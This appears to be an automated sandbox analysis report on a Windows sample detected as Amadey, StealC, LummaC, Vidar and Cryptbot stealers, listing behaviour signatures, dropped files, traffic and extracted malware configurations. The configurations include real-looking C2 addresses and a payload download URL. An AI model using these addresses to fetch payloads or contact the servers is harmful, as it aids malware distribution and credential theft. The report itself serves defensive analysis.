Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561158
MD5: c524f231dbe4c55a328876f06e2a82d1
SHA1: 8d4c24359d577fcbc818158fc79554169690273b
SHA256: 9561f2e19612f381dfbe538ba59f4f6f4cefe5d0d0f26f0b7fa1fcd095b9f708
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206/c4becf79229cb002.phpHu8 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpR% Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php8254001 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/K Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpN_) Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/rnd.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dll_ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000009.00000002.2158334223.0000000000821000.00000040.00000001.01000000.0000000B.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 0718eb7837.exe.6588.14.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C5BA9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B4440 PK11_PrivDecrypt, 0_2_6C5B4440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C584420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C584420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B44C0 PK11_PubEncrypt, 0_2_6C5B44C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C6025B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6C5BA650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C598670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6C598670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6C59E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6C5DA730
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 0_2_6C5E0180
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B43B0 PK11_PubEncryptPKCS1,PR_SetError, 0_2_6C5B43B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 0_2_6C5D7C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 0_2_6C597D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 0_2_6C5DBD30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 0_2_6C5D9EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B3FF0 PK11_PrivDecryptPKCS1, 0_2_6C5B3FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 0_2_6C5B3850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 0_2_6C5B9840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DDA40 SEC_PKCS7ContentIsEncrypted, 0_2_6C5DDA40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 0_2_6C5B3560
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_b6ad1a30-e
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49941 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49975 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49991 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: Binary string: UxTheme.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: rsaenh.pdb source: firefox.exe, 00000031.00000002.3374809913.0000024F746EB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: ktmw32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WscApi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8WinTypes.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdbh source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xul.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nssckbi.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: cryptsp.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3374809913.0000024F746EB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8softokn3.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: profapi.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntmarta.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shell32.pdbXULBroadcastManager source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: CLBCatQ.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: urlmon.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8twinapi.appcore.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8kernelbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: UxTheme.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8CoreMessaging.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: win32u.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: CLBCatQ.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8bcryptprimitives.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: srvcli.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: imm32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: freebl3.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: version.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mswsock.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8gkcodecs.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8iphlpapi.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8ExplorerFrame.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nsi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winmm.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 2aff342b40.exe, 00000023.00000003.2855859321.00000000049E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8osclientcerts.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8CoreUIComponents.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8cryptbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msasn1.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8msvcp140.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ncrypt.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8webauthn.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8Kernel.Appcore.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8powrprof.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8MMDevAPI.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wininet.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8kernel32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8oleaut32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: combase.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: rpcrt4.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8TextInputFramework.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wshbth.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8InputHost.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 8ucrtbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xOneCoreUAPCommonProxyStub.pdb source: firefox.exe, 00000031.00000002.3375134799.0000024F747BC000.00000004.00001000.00020000.00000000.sdmp
